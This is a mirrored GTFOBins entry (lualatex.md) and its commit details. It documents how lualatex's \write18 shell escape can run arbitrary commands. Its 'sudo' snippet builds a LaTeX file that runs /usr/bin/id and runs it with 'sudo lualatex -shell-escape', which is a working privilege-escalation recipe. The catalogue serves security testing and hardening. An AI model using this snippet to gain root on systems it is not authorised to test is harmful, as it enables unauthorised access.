1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
GTFOBins.github.io/_gtfobins/lualatex.md
SynackCerv 806c8054eb
Create lualatex.md
Add lualatex.
2021-04-22 22:16:14 +02:00

489 B

description: lualatex is a symbolic link to luatex. However the program does not have the same behaviour regarding the name of argv[0]. It allows to call external command with \write18 but it also allows to call external lua scripts. functions: sudo: - code: | echo "\documentclass[12pt]{article} \usepackage{shellesc} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex sudo lualatex -shell-escape file.tex